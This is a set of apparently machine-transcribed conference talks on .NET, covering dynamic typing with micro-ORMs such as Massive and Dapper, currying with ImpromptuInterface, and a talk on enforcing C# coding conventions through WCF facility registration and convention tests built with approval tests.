Interestingly, Massive was distributed as a C# file, not a DLL. Massive is just a file that you bring into your project; it lives in its own Massive namespace and provides a whole bunch of extension methods and classes that give you your ORM access. So if we look at our Massive repository, this is what that looks like. In Massive, you inherit from the Massive-provided DynamicModel, which essentially represents a table. So we've got Discounts, which inherits from DynamicModel. DynamicDemo is the name of the connection string, and we say the primary key field is ID; that's how it can easily access single things. And then consuming it looks like this. We make ourselves a new Discounts, which is this dynamic object, or wait, no, it's not dynamic, I was thinking of something different. So we make a Discounts. Discounts has an All method. And then, interestingly, we don't write full SQL here. We just use named parameters to say the where clause should be where the code is the code that we expect, the args are going to be the code, and the limit is one. Then we pull out that result and have it act like a discount definition. So that's the Massive approach to things. If we want to just select all of my discounts, that's how that would work. Saving: here we don't have to do as much. What I'm thinking is we can probably just pass in the discount now, because it's strongly typed. If you passed in the dynamic, there was some weirdness because it couldn't detect the types or something. Anyway, so that's Massive. Another example is Dapper, from the guys at Stack Overflow. Dapper does less for you. It assumes that you want to manage your connections and that kind of thing. But given an open connection, it gives you extension methods that make querying return dynamic stuff. So we have a GetAll. We do a query, select star from discounts, and that just returns an IEnumerable of dynamic, which is going to fail when we run it, because we need ImpromptuInterface to ActLike on the row. So now if we run the Dapper version (I don't really know why I'm running all of these, because the result is the same; I guess just to prove that I'm not messing with you), our seven went away. Why did our seven go away? Let's put it back. Now let's try this again. Okay, probably something with the Compact SQL database. So there are different options. Besides Dapper, there's Simple.Data, which is the one that I was thinking of, where you actually make a new dynamic thing and that is your database; so essentially we would do something like database.Discounts, and it just infers the name of the table from how you access it, and then .All, .Find, that kind of thing. So Simple.Data, Massive, Dapper: find one that works for you. There are dozens of them. Dozens is probably exaggerating; there are probably almost a dozen by now. So find one that you think is interesting, useful, et cetera. Any questions about the data access stuff? So this is the sort of tedious mapping that dynamic can allow you to avoid. You'll notice nowhere in here are we saying what type these columns are or any of that. It just figures it out for you. You ask me for an int, so I gave you an int. That alone is some pretty severe savings. Combine that with the ability to say, all right, now we've pulled it out, here's an interface, there's no explicit mapping; you gave me stuff, now treat it as a discount definition, and now you're statically typed all the way down.
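A hedged sketch of the two access patterns described here, with made-up connection and table names; the Massive table class and the Dapper extension method are used the way the talk describes them, not necessarily the way the original demo was written:

```csharp
using System.Collections.Generic;
using System.Data;
using System.Linq;
using Dapper;
using Massive;

// Massive: a table is represented by a DynamicModel subclass; rows come back as dynamic.
public class Discounts : DynamicModel
{
    public Discounts() : base("DynamicDemo", tableName: "Discounts", primaryKeyField: "Id") { }
}

public static class MicroOrmSketch
{
    public static dynamic GetByCodeWithMassive(string code)
    {
        var table = new Discounts();
        // No hand-written SQL for the simple cases; named parameters describe the query.
        return table.All(where: "Code = @0", limit: 1, args: new object[] { code }).FirstOrDefault();
    }

    public static IEnumerable<dynamic> GetAllWithDapper(IDbConnection openConnection)
    {
        // Dapper assumes you manage the connection yourself; Query without a type
        // argument hands back dynamic rows.
        return openConnection.Query("select * from Discounts");
    }
}
```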
Yeah? So any other questions? All right, one more example for you. I'm big into functional programming, an F# enthusiast, all that sort of stuff. Currying is the idea that functional programming languages internally represent methods that take a series of arguments as functions that take one argument and return a function that takes the rest. So if I take three parameters and you give me one of them, I say, all right, I have one, now give me the other two; it returns a function that says give me two arguments and I'll give you the result. Currying is built into functional languages, so I was thinking dynamic could probably support that: just wrap my thing in a currying wrapper and let me use the methods on it dynamically, and if I don't pass in enough arguments, return me something that says give me the rest. I was thinking this, and then I noticed that ImpromptuInterface already did it, which is kind of neat. So this is what currying can look like. Currying works best if you give it an explicit delegate instead of, say, a method group. So here we're just giving ourselves essentially a method called logger that, given a file, a line number and an error, writes that out to the console: there's an error in this file, on this line, and here's the message. Given this logger, this is what currying looks like in static languages, well, in C#. We actually have to explicitly spell out that curried is a function that takes a string and returns a function that takes an int, which returns an action that takes a string, and that means it returns void. And then we break it out: here's the F, here's the L, here's the E; once I have all three, return my result. So we can say, all right, error in program here, and now that's a curried program.cs. So now program.cs as a file should be shared between line 12, invalid syntax, and line 16, missing return. Indeed, program.cs now is shared; we've got line 12, we've got line 16. All right, so that's the static version: very awkward, you have to call it one parameter at a time, just not fun. I don't recommend doing it. Now dynamically we can just say Impromptu.Curry. And Impromptu.Curry returns a dynamic, and that dynamic happens to be a function that can be invoked with any number of arguments. So we say, all right, curry me with program.cs. Now pass in 12, then pass in invalid syntax, or pass in 16 and missing return statement all together. Regardless, it says, once I get to three arguments, I'm good, and it returns the result. Ta-da. So I'm not sure how practical this is. I've never actually needed to use this. But it's just one more interesting way that, with dynamic, objects aren't necessarily all that they appear. There are a lot of interesting things between duck typing and all of that. So hopefully I've piqued your interest enough that you'll take a look at these projects. So again, here's that link. Most of them are available on NuGet. And then this presentation with all the code is up on GitHub, if you're interested. If you do anything interesting with this, please let me know. ImpromptuInterface actually started from a guy that saw this talk like three years ago. So thanks for coming. And if you have any questions, I'll be around afterwards. Thank you.
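As a footnote to the currying example above, a minimal sketch of both versions; the log format and file names are illustrative, and Impromptu.Curry is used the way the talk describes it:

```csharp
using System;
using ImpromptuInterface;

class CurryingSketch
{
    static void Main()
    {
        Action<string, int, string> logger = (file, line, error) =>
            Console.WriteLine("Error in {0} at line {1}: {2}", file, line, error);

        // The hand-rolled static version: one awkward nested delegate per argument.
        Func<string, Func<int, Action<string>>> curriedByHand =
            file => line => error => logger(file, line, error);
        curriedByHand("program.cs")(12)("invalid syntax");

        // The ImpromptuInterface version: partially apply with whatever arguments you
        // have, and the underlying delegate runs once all three have been supplied.
        dynamic curried = Impromptu.Curry(logger);
        dynamic forProgram = curried("program.cs");
        forProgram(12, "invalid syntax");
        forProgram(16)("missing return statement");
    }
}
```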
|
It's been a few years since dynamic .NET went mainstream with the promotion of the Dynamic Language Runtime into .NET 4, but it's still largely viewed as a fringe technology. This session aims to change that by reviewing what the DLR is, diving into how it works with C# 4 and Visual Basic 10, and looking at some interesting applications of dynamic typing in static languages. In particular we'll discuss C# interop with IronPython and IronRuby; simplified data access through micro-ORMs like Simple.Data and Massive; and static duck typing with ImpromptuInterface.
|
10.5446/50979 (DOI)
|
So, this is a talk about my experience using conventions in C#. I'm going to talk about how I use conventions, what problems I faced when I used conventions in C#, and how I overcame those problems. This is obviously not the only way of handling those problems, but hopefully you'll find it useful. It will be slightly more theoretical at the beginning, but bear with me, it will be more hands-on in the second part. My name is Krzysztof Kozmic, and I'm a consultant. I work for a company called Readify down in Australia. This is my day job. When I come back home, I keep writing code. Some of you may know me for my contributions to the Castle Project. Are there any Windsor users in the audience? Wow, cool. Yeah, so I've been responsible for what's been happening to Windsor over the last three years now, since I think 2009. I also have some other open source projects on GitHub under my own umbrella, and I will mention two of them today. Slides from this talk and the demo will also be available on GitHub. I have a blog. I'm on Twitter. I actually prepared a custom T-shirt with my Twitter handle here so that it's easier for people to recognize me, but I will hide it, because I learned that yesterday they changed the logo. So now it's a retro T-shirt. Okay, so this is what I do. When it comes to how I do it, the approach that I like is something called zero friction development. Is anyone familiar with that term? Right, a few people. This is something that I think Oren Eini and I came up with in 2008. What it basically means is an approach of removing all of the mundane, boring and uninteresting things that slow us down as we provide value in our software. In a way, this is the lean tenet of eliminating waste applied to the act of creating software. During my work with different clients at Readify, and while helping people on Stack Overflow or on the Castle user group with the problems they are facing, I noticed that very often the problem they have is related to friction. One thing that I know from experience is very good at eliminating friction, the best one that I've found so far, is introducing conventions to the code base. There are many definitions, and the one that I like is this: a convention is an agreed-upon approach to carrying out a particular set of tasks. So this is like driving a car. Whether you have a Toyota, a Ford or a Saab, every car will have a steering wheel, and the steering wheel will work pretty much the same. You turn it right, the car turns right; you turn it left, the car turns left, in every single car. It's a convention that you stop at the red light and you go on the green light. It's a very useful convention. You would probably not want to keep driving when the light is red, unless you are crazy, right? Twitter is an even better example of that, because it's more recent. Who's on Twitter? Obviously, everyone. If you remember back to ancient days, like 2007, things like mentions, hashtags or retweets didn't exist as an explicit concept. You couldn't click them like you can here. If you called the Twitter API, you wouldn't get a collection of people that were mentioned in a tweet, or hashtags that were mentioned in a tweet. This is something that people were just doing to solve the problems they were having. I want to tweet something and it's in relation to someone; how do I do that? I put an @ sign and I put the Twitter handle of that person. Done.
I tweet something and it's with relation to something. For example, a conference. Well then I put a hashtag and some unique, hopefully relatively unique word to mean what I want to say. Then Twitter, the company, they saw that this is something that people are doing. People take value from it. They took it and made it an explicit concept in their system to enrich the experience that we are having on Twitter. You can do something similar for your development team by introducing conventions to your code base. Very often, however, we are faced with an approach like this. If we are working with C sharp, C sharp is a really nice language but people tend to have the problem that we won't be using this because it is not compile time save. We won't be using conventions because by definition, because this is an agreed upon approach that we as a team, not the C sharp development team, decide to follow, this is something that the C sharp compiler doesn't know about so it will not be able to validate it. C sharp is a really nice language. It's a general purpose, strongly typed language and statically typed language. It has certain interesting characteristics. The strongly part means that the types that we create in the language don't change. If I have a class called customer, it has a method called pay and it has a property called name, after I have compiled the code, the class will not change. It will not get a new property. It will not get new methods. The method will not change its signature and it will not suddenly become static or abstract. The property will not change its type and suddenly name will become an int. The statically typed means that all of those things, the types and the names of everything are determined during the compilation time and checked during compilation time. Some of them are also checked at runtime. This is great. I love C sharp. It allows for very nice tooling to exist to aid us in development. Because I use a type that's in an existing assembly and the tooling knows that this type has certain set of methods or properties and it will not gain new ones or they will not change where I mistyped something and I typed something that it doesn't know about. It knows that it's an error. It can tell me very quickly as soon as I type it, hey, this method does not exist on this type. The tooling can inspect the metadata about those types and can provide me with help while I write my code. We get intelligence from that. We can also see documentation. Tick typing allows for very smart refactoring support. Because we've got all of that metadata about this type, the tool can look at what types I have in my system, how I'm using those types and if I want to rename something, it can very smartly rename just the right things for me. We tend to rely on the compiler to tell us when we have problems with our code. When I have a type and I try to assign a property that doesn't exist, this code will not compile. And we rely on this. How many of you have written a code, made a change and then hit control shift B to then see that fail and then went over every single place that failed to fix it? Right? Pretty much everyone. But the problem happens when we rely on the compiler too much. And people feel very uneasy when they see code like that. And I'm using dynamic as an example. But if you think back, even when C sharp 3 came out and the var keyword was introduced, do you remember the flame words that were happening on blogs and forums? Oh, var is so bad, it makes my code unreadable. 
It's not dynamic, I cannot validate it. Right? Obviously not. But the mere thought of there is something that the compiler will not be able to check. It freaks people out and the same thing happens for conventions. Like I said, by definition, they will not be checked by the compiler. It makes people uneasy. They push back. We will not be using conventions because of that. But what we have to realize is that there is no way to write a non-trivial program that will be fully validated by the compiler. Let's take this piece of code as an example. This is from a real app that I was working at. Well, this is a simplified version of that. And this is the same problem that I was facing there. This is for a client that was in a regulated industry. Certain actions in the system had to be audited. And then we needed to show this audit in the audit UI. So we had a hierarchy of classes, audited action classes. There was the base audited action class and inherited audited actions for every action that was being audited in the system. And then we had a corresponding hierarchy of DTOs. The problem here is, how do we take those audited actions and then convert them to DTO so that we can display them in the UI? And this is one way of doing it. We get all the audited actions and then we interrogate them. Hey, are you a disconcrete type? No, I'm not. Well, then maybe you're a disconcrete type. Well, not really. Oh, maybe this one. Well, actually I am. Okay. Then I will create a corresponding audit deduction DTO. I will downcast you to your real type and I will copy this property to DTO, that property to DTO, and then add the DTO to the collection and then move on to the next one. So the rule here is that we need that if for every single concrete audit deduction type. But if you forget to add it for one, will the code compile? Well, obviously it will. Will it work? Well, it, I guess, depends on your definition of work. Depending on what's at the end of this for each loop, it may either fail at runtime, give you an exception and embarrass you during the demo, or it may not fail and then the audit deduction will just not appear in the UI and then you may find for that because as much as the auditor is concerned, well, your code is not auditing this thing and it should have. And this is because Cshab is a general purpose language. It has a general purpose compiler. It does not know about those rules that you have in your system. So why don't we just forget about it for a moment? Why don't we just let go of this thing that the compiler can help us? Let's forget about the compiler. Let it sink in for a moment. We'll just put the compiler away and forget that the compiler does any validation because it actually doesn't do it as its primary purpose. The primary purpose of the compiler is take your Cshab code and do two things with it. Generate IEL and generate a set of metadata about all the types that you have in your system. And as it goes through that and it sees something that it doesn't like and that doesn't know what to do with it, then it delegates to you, hey, there's something I don't like. I don't know what to do with it. Fix it. And then we have compilation errors. But that's not the primary purpose of the compiler. So let's not over rely on it, okay? And then let's step back and try to rethink how we use conventions and how perhaps using conventions can help us in this scenario. And this actually already is a convention, if you think about it. It is an agreed upon approach to solving a particular problem. 
We've got a set of audited actions. We need to convert them to DTOs so that they can be displayed in the UI, right? It clearly is one agreed-upon way of doing that, with those ifs and AddDto methods. It's just not a very good convention. Why is it not a very good convention? Well, first of all, this code is horribly, horribly boring to write. How many of you attended Hadi's session this morning? Right? He was talking about this. We don't become developers to write this sort of code. Would you be excited if you woke up in the morning thinking, wow, I'm going to write some ifs and some AddDto methods and some mapping code? Wow, this is so awesome, right? We don't do that. You don't need a developer to write it for you. You need a typist, someone who can type. You can explain it to a child who doesn't know C#, or to somebody, not necessarily a child (I'm not advocating child labor, by the way), but you can explain it to someone who doesn't know C# because they're not a developer, and they will be able to do it, because the algorithm for doing it is very simple. Let's look at another example. This is from the same system. We had a set of reports that we needed to render and display to our users. So we take a report from the database, an instance of a Report class, and then we need to locate a corresponding RPT file, a Crystal Reports template file, for it. And then we render it. So how do we approach this problem? How do we locate the template knowing that we have a given report? The path to that file looks something like that. It's on the server, and basically we as a development team had the liberty of deciding where we wanted to put those files. The server would change between different environments, but it was completely up to us how we structured that. So we can approach it in a very similar way to the previous example. We can hard-code all of the mapping between the report, say based on ID, and the path, and then just randomly put all those files somewhere. If we are smart, we'll probably put it in the config file, because this is cool, and then we can change it between different environments. But this is, again, us doing the job. This is a convention in a way. It's a convention that says we locate RPT files for reports by looking them up in the config. But it's a convention where we are doing the work. So why not turn it around and devise a convention that will do the work for us? And this is what we did. This is how we implemented that method: based on information from the report, we devised a rule that we'll use information from the report to create a path, this is where we are going to put the file, and we will consistently follow it for every report. And then with this small piece of code, given the report, we can reconstruct what the path is without having it hard-coded. Notice how different this code is from the previous example. It's so much simpler. Again, even if you're not a developer, you could probably understand what it's doing. It's so much less code. There's so much less glue code: all those ifs and curly braces and semicolons and everything. And one other important point: it doesn't use a framework. When people think about conventions, they often think in terms of frameworks: I'm using a framework, the framework forces me to use conventions, therefore I use conventions. But this is not necessarily how it has to happen.
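For the report example described above, the convention-based lookup might be sketched like this; the Report properties and the folder layout are assumptions, not the original project's rule:

```csharp
using System.IO;

// Derive the template location from the report itself instead of looking it up in config.
public class Report
{
    public string Category { get; set; }
    public string Name { get; set; }
}

public class ReportTemplateLocator
{
    private readonly string templateRoot; // e.g. @"\\server\Reports", varies per environment

    public ReportTemplateLocator(string templateRoot)
    {
        this.templateRoot = templateRoot;
    }

    public string GetTemplatePath(Report report)
    {
        // The convention: {root}\{Category}\{Name}.rpt, followed for every report,
        // so the path can always be reconstructed from the report alone.
        return Path.Combine(templateRoot, report.Category, report.Name + ".rpt");
    }
}
```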
Don't constrain yourself artificially to using conventions only when you are dealing with a framework. If you were actually to introduce a framework here, I don't think we could easily make this code simpler. It would probably only make it harder to read and harder to maintain. This is as simple as it gets. And I'm not saying that you shouldn't be using frameworks. A well-designed framework, a framework designed with conventions in mind, can really help you limit the number of lines of code that you are writing and can simplify your architecture very nicely. WCF is a really nice example of the opposite, really. How many of you have seen services like that, right? If you go to MSDN or certain blogs on how to apply behaviors to WCF services, this is what you are going to get. And this is what we were following on the same project. We needed services, we needed to apply some behaviors to them. So that's what we did. We followed what MSDN says, what the blogs say. We needed a behavior? Well, let's put an attribute there. We need another one? There is another attribute for that. We need a behavior on an operation? Well, put it on the method, right? And we had plenty of services, and each of them looked like this, because we were consistently applying the same set of behaviors. This was our convention. Every single service looked like that. If we needed to add a new service, you would find an old one, copy-paste all the attributes, and then we would be done, right? And this is just one part of it. I'm not showing you everything, because let's not forget about the XML configuration, all of the ABCs (address, binding, contract) and all of the other things you put in XML. And this was hosted in IIS, so we also needed the SVC file for every single service that we had. So this is obviously not pretty, right? And you would think there has to be a way to do it better. There has to be a tool that would allow us to apply the same behaviors and configure the same services in a simpler way, without us doing the job again, but with the tool doing the job for us. And this is what we did. We started using Windsor's WCF facility. And then, in this small amount of code, we were able to register all of our services in the IoC container. And because the WCF facility is a tool specifically designed to configure your WCF services by convention with a small amount of code, with this Configure method we were able to say: those are my WCF services, and configure them in this way, make them hosted in IIS, open them eagerly, publish the metadata endpoint and all the other things. And this single piece of code was responsible for registering all of our services and applying all of the behaviors to them. The only thing that we needed to add on top of that was a few lines in our Global.asax so that we didn't have to have SVC files; we were using routing instead to expose the WCF services. Now I will share a secret with you. We did that only after nine months of development. For the first nine months, we were doing the other thing, with the attributes and the XML. And why we did that has to do with this graph. This is the graph that shows us on the x-axis the size of the problem that we're dealing with; in this case, this is the number of WCF services that we have. And on the y-axis, the amount of code that we write to support this problem. The red line is how much code we have if we hard-code all of that with the attributes.
And the blue line is the amount of code that we have when we have an automated convention. And the important bit is the lower left corner. This is when you have a very small number of services, probably one. Because when you do that, it's actually less code, or can be less code, to register things by hand like that, to expose and to add the behaviors by just slamming in an attribute. It's less code to just put an attribute than it is to write that installer that I just showed you. But by doing that, you set a precedent. Because then the next guy that comes along and wants to add another service, or wants to add another behavior, sees that code. And because we as developers generally tend to be nice people, we just follow what the other guy did. So we are just going to do the same thing. And then another behavior comes along, and another service comes along, and very quickly we are going to end up somewhere here. And only at this point did we realize, or maybe we actually realized this much sooner, but at this point we actually decided that we are going to change that. Why did we do it only then? Well, it's human nature, first of all, to follow the established convention. And another reason is that there's friction, a small amount of friction, in actually having to go and re-architect all of the WCF services that we have. Although I must tell you that removing all of those attributes and all of that XML, specifically the XML, and the SVC files was really liberating and really nice. But this is obviously not the end of it. Because it's not just about having more code or less code. Another thing is that conventions are implicit. If you have a WCF service with some attributes on it, just by looking at that WCF service you see those attributes, and so you see that those behaviors are being applied to that WCF service. If you do it with Windsor's WCF facility, or any other tool like that, you don't see this. It's just a normal class. And you have to trust that those behaviors are going to be there at runtime. You do not see this. This is like standing on a glass floor. This is a picture from a building in Chicago, I think, from a balcony that has a glass floor. And then you look down and there is like 100 meters of nothing and a piece of concrete waiting for you. And I don't know about you, but this picture freaks me out. And this is what happens with people when you are using behaviors like this. They look at the service and there's nothing there. It's like here: I step out and there's nothing there. And I don't want to feel like Wile E. Coyote from the Looney Tunes cartoons, right? He always runs and runs and runs and there's nothing there, and he just looks at the camera and then falls down, right? We don't want to feel like that. But this is the feeling that we often get.
And the only thing we need to do in this case is there's an extension point called I type matcher that will be called down for every element in the collection and will be passed among other things, the actual concrete type of the audit action. And then using conventions based on the name, we find the corresponding DTO type. But it's obviously not immune to failure. Things can still go wrong. If I have an audit action, but I forgot about creating the DTO, well, I will get the failure at runtime still. So even though I have less code, it didn't really help me to avoid problems. Actually, it's still bad because we still have this glass floor, this thing that I don't really, I cannot really touch. There is an exception somewhere in this weird code that I don't really know what it's doing and the cause is far from the effect. It's far from the effect in terms of in time because it fails at runtime, but the cause of this is that when I created my audit action, possibly yesterday or a week ago, I forgot to create the audit action. And it's far in terms of code because it's failing somewhere in my audit service, but the reason for that is because in a different project, I forgot to put a class. So how do we solve that problem? Discipline. We will make developers remember every time you create audit action, create a DTO, solve. Right? Perfect. We can go home now. Well, not really. Well, obviously, this may kind of work if you have one convention, but you will never have just one. You will have plenty. So you will have the WCF services and behaviors and you will have the RPT files and you will have the reports and plenty, plenty of others. And human brain has only certain capacities, so we will obviously not be able to remember everything. Well, then there's a better solution. Let's create the wiki and put it in SharePoint and make people remember to read it. Right? Who has seen projects like that? Obviously. Yes. Well, again, the same problem. It may help you to a point, but then you have to remember that there is something that you are supposed to read and where it is. Right? So, again, there's the problem that we are forced to do the work. We are forced to remember. We are forced to go and look and find something in SharePoint and find the wiki and read it, which may also be a problem in itself and understand it. So we need more visibility. This is the problem. This is the real underlying problem with using conventions in those scenarios. That the convention is doing something, but we don't really know what it's doing, why it's doing it, when it's doing it. So, how can we raise the visibility? How can we remove the glass floor? Well, one way of doing that, that most tools and most teams that I've worked with are doing is we need something tangible to begin with. If we want to go and look at those conventions and be able to see if they are being applied correctly, if they are being applied at all, and what they are doing, we need something tangible. So, let's turn to the C-sharp language, to the starting nature of C-sharp and remember that it creates the IL, the C-sharp compiler creates the IL when it generates, but it also creates a set of very rich set of metadata about those types and about relationships between those types. And we have API to do that. It's called reflection. So why don't we structure conventions in a way that makes it easy for us to inspect the things that we care about using reflection? So, I'm sure most of you are familiar with this example. 
This is, say, WCF or ASP.NET MVC; they have conventions like that. ASP.NET MVC uses a base type, or actually an interface, to find the types it cares about. It cares about controllers, and a controller is a type that implements IController. We can very easily inspect those sorts of things with reflection. We can use generics. We can say that the type that is the data source for my monthly revenue per client report is the type that implements IReportDataSource of that report. Again, something that can be easily checked with reflection. We can use custom attributes. This is what WCF does to denote the contracts, or this is what MEF is doing. We can use the name. This is what we did with the audited actions: based on the name, a naming convention, we match one type to the other. You can even use location. If there are types that don't really have that much in common with each other, but they serve the same or a similar role in the system, maybe put them in the same namespace. Where are we going to do that? Where are we going to do that reflection magic to inspect those things? First of all, what we care about is a very short feedback cycle. We want to have a similar experience to just writing a piece of code, hitting Ctrl+Shift+B, and having the compiler tell us it doesn't compile. We want to have a similar experience for this; we want a similar experience for our conventions. Well, you have an audited action, but the DTO is missing. Would you like me to help you with that? How can you do that? One way of doing that is, okay, let me step back. How many of you write tests? Right. Pretty much everyone. If everyone writes tests, and tests run right after we compile the code, hopefully before we commit, then why not use the tooling that we have for testing? We usually have rich IDE integration. We have tools that run the tests. Some of us use tools that run the tests continuously in the background. Why not leverage that to run our conventions? Why not use testing frameworks not just to run tests that validate the logic and behavior of our system, but also to write tests that validate the structure of our system? Why not leverage the unit testing or other testing framework that we are using to do that work for us, so that we get a very short feedback cycle and we get a really nice experience and really nice visual integration? Now I'm going to show you how we did that. We don't really have that much time, so perhaps instead of writing this, I will just do the shorter version and show you the final version of what it looks like. The first problem is: where do we put them? Where do we put those tests? Some teams want to create a separate test project that has just conventions, to make them explicitly separate. The approach that I take is generally to just have a Conventions folder in my test project where all my conventions are. The important bit is that you stay consistent. There are two roles that those tests are going to serve. The first is to tell you where the problems are, and when you hit those problems. The second is to serve as executable documentation, a replacement for that page in SharePoint. A very important thing is to install all of your Windows updates before you do the presentation. Another very important thing, even more important, is to make them as readable as possible, so that when someone comes along, they can very easily look at your conventions and learn what the conventions are, how your system is structured, and how it works.
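A small reflection sketch of the kinds of queries this makes possible; the matching is done by name here purely so the sketch needs no MVC or WCF assembly references:

```csharp
using System;
using System.Linq;
using System.Reflection;

static class ConventionQueries
{
    public static void Dump(Assembly assembly)
    {
        var types = assembly.GetTypes();

        // By base type or interface: "a controller is a type implementing IController".
        var controllers = types.Where(t => !t.IsAbstract &&
            t.GetInterfaces().Any(i => i.Name == "IController"));

        // By attribute: everything marked with [ServiceContract], say.
        var contracts = types.Where(t => t.GetCustomAttributes(false)
            .Any(a => a.GetType().Name == "ServiceContractAttribute"));

        // By name: everything that follows the *Dto naming convention.
        var dtos = types.Where(t => t.Name.EndsWith("Dto", StringComparison.Ordinal));

        // By location: everything living in a conventional namespace.
        var reports = types.Where(t => t.Namespace != null && t.Namespace.EndsWith(".Reports"));

        Console.WriteLine("{0} controllers, {1} contracts, {2} DTOs, {3} report types",
            controllers.Count(), contracts.Count(), dtos.Count(), reports.Count());
    }
}
```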
For that, based on the projects that I was working on, I have a small Nougat package which is called convention test. It says local here, but it is also available on Nougat. This is a very simple thing that doesn't have much behavior in it. All it does is it provides structure and plugs into any unit to allow me to quickly and simply write those tests. You want to make them as simple as possible because if you make them complicated, people will not write them. We really want to care about the experience that developers on the team have when writing those conventions. Also because they are supposed to be your executable documentation, they need to be very easy to read. This is a very simple package. It's code only, it's not a binary, and it pulls in some dependencies. You need wins or an approval test. I'll talk about this in a second. What it allows me to do is it allows me to write tests like this. First of all, this is how I name my tests. There's one test per class, and the way I structure them here, the way I name them is I want to give out what the convention is by just looking at the name of the test. You should be able to know what the conventions are just by looking at what the convention's classes I have in this folder. The way they are implemented is, for example, let's look at each audit deduction has a DTO. If I have this convention test base class here, this is what comes in the Nougat package. What it forces me to do is it's an abstract class, and what it forces me to do is it forces me to override this single method. This single method is just so that I return something called convention data, which specifies what my convention is. It says that types where T is a concrete audit deduction, which means it's a class and it's an abstract, must have corresponding DTO. This is a very simple thing that looks up by the convention, deconstructs the name of the DTO, tries to locate the DTO type, and it tells me whether it's found the type or not. Now that I run this test, the way it's structured is I actually notice that this is not the N-unit test. There is no test attribute on the method. There is no test fixture attribute on the class, and there is no resharper helpers for running those tests. I actually run those tests by the test itself is in this run file, and it's a parameterized test. This is the test itself, and it takes those I convention tests, those types here, and then it runs them. This is so that I am forced, or the developers that do this are forced to have one single convention per class. This is a different one. Okay. So now, if I run that, each audit deduction has a DTO, well, the test will pass because I am conforming to my convention. That's great. But the interesting thing is if I, for example, go and I rename one of the DTOs, or I rename one of the audit deductions, right? So what happens now, if I run the test, if I run the test, that the test will fail. It fails, and it tells me invalid types found, and it's even nice enough to tell me what the type is. And it tells me that each audit deduction has a DTO. Notice that it doesn't even have underscores. This is to make it easier to read for people, the way I name the test, I plug into any unit and I even remove the underscores. So this is nice. We can even improve it better. We can make it better. Because it's not just about telling people that there is a problem. We want to go this extra step and tell them how to fix that problem. Or we want to tell them exactly what the problem is. 
We've seen that I said, well, there is an audit action that is missing a DTO. Well, okay. So what? Right? So I can say, well, this is the failed description. This is where I can say the first line of that message which says, well, there are audit actions that have DTOs missing, if we have that, we pay a lot of money to someone. Right? So we explain what the problem is and why it is a problem. And we can even be nice enough to say, well, okay, there is a DTO missing. I don't know what the DTO is supposed to be, where it's supposed to be. So I can specify a failed item description which will construct a message and it will tell me, well, what the expected DTO type name is for that particular type. So if I run this test again, and if we look here, the message now will be much more useful. It will say, there are audit action DTOs missing. There is all that message that I put in and it tells me, it expects an audit action DTOs which is the namespace bar audit action DTO for this audit action type. So this is actionable now. Now I know where I'm supposed to be looking at. Now I can go and look for that bar audit action DTO if it's there or if it's not there. Right? So this is one part of the coin. Another part of the coin is I started by looking at audit actions. But what if a new developer comes along and it looks from the UI and it knows there are all of those audit action things that it needs? So it will create an audit action DTO only and now it will expect it to work. Here is this convention magic thingy that will make it work. I don't really understand what it's doing, but it will make it work. And he expects this to happen, but it doesn't. This test will not fail because there is no audit action for this DTO. So we need another test. We need a test that will tell this developer, hey, you've created a DTO. Now we also need a corresponding audit action. So this would be a very simple test. This one. This would be a very simple test that will do the same thing, but from the other end. And this is important to do both of them. So that regardless of which approach people take on the project, those tests will fail and will fail consistently. So this is nice and easy. Not all works except in real life. Not all rules are all black and white. So in this case, you can say, well, every single audit action, no exception needs a DTO. But most rules that we have have exceptions to them. One example that we've had is we had a rule that said, well, DTOs, they are really just data containers that we pass along. So they should have no methods and they should have no static members because why would they? Right? But for particular aspect of the system, when we were integrating with a legacy application, we were not in control of the DTOs. And there was a DTO type that, well, was that conforming to that rule? It had a static method that looked something like that. It had a flag and we needed to know whether it's active or not, what the value of it is. So we had a convention, but it had an exception. And it kind of breaks this, our nice approach that we've had there because, well, it doesn't seem like there is an easy way to say, well, every single except for this one. Well, we can do that when we go here and we say, well, every type that is a concrete audited action needs to have a DTO or in that case would be, must not have a static member if it's a DTO or we might say, well, except if it's this one or that one or that one. 
But this kind of misses the point because the point of this test, among other things, one of the primary points of this test is to be readable. People will come to the project, people will read that code and they are supposed to understand it as quickly as possible. People will come back to parts of the code base that they haven't touched in six months and they should be able to read it and understand what it's doing. So we want to make those tests as simple as possible. So how do we do that? How do we accommodate those exceptional cases that don't really conform to the convention we've established? And a way to do that, so this is the convention that we have. So it has the same base class and it returns this type and it says, well, every type that name ends with DTO, this is how we define our DTOs, must have no static members. So this is a method somewhere here below that looks for static types using reflection. Very, very simple. We have the file description, we have the file item description when we say, well, which type and which members are static that we find on it. And then I have this additional method called it says with approved exceptions. And then we say, well, unless we parse string status. So this is a piece of text that explains why the exception exists. And if I run this test now, it will pass, but it will fail. Will it fail? It will pass, but it will fail if I do this. So let's disregard what I just did. We can cut it out, right? Okay. So I run this test now and this is my test. And it will fail, but it will fail in a very interesting way. And this will blow your mind if you haven't seen this before. Well, at least I know that it blew my mind the first time I've seen this. That is what happened. The test failed and my diff tool popped out. My diff tool popped out and it has the text, this exception message text that my convention is creating on one side and it has an empty file on the other side, right? And notice the file. This is a file named after the test that says received and on the other end it has the same file called approved. So this is the framework that I'm using here. I didn't create it, but it is really great. You should check it out. It's called approval tests. And approval test, what it does is it generates an output of your test, an expected output of your test, and then you look at the output and you approve it. And this is the, and it then gets persisted. And then you compare the subsequent runs of your test with the approved version. And so it will pass if nothing changes in the output, but it will fail if something changes. So in this case, I did not have that file because I just removed it. So the approved file is an empty file. And it says, well, static members found on a DTO types, on this DTO and this method. So now I can do very quickly without obscuring the code of my test is using all the power that my DIFT tool gives me, I can say, I approve of that. This is correct. This is fine. This is what it's supposed to be. We don't control this test. We don't control this, sorry. We don't control this DTO. This DTO is coming from a legacy system. So I now save that and I now click commit. And this is also important bit. I click commit. I commit that file to my repository so that all the other developers have the same approved file. And as I commit it, in the exception message, I say why I did that. Why this is okay for this file to be, for this type to be different than the convention specifies. 
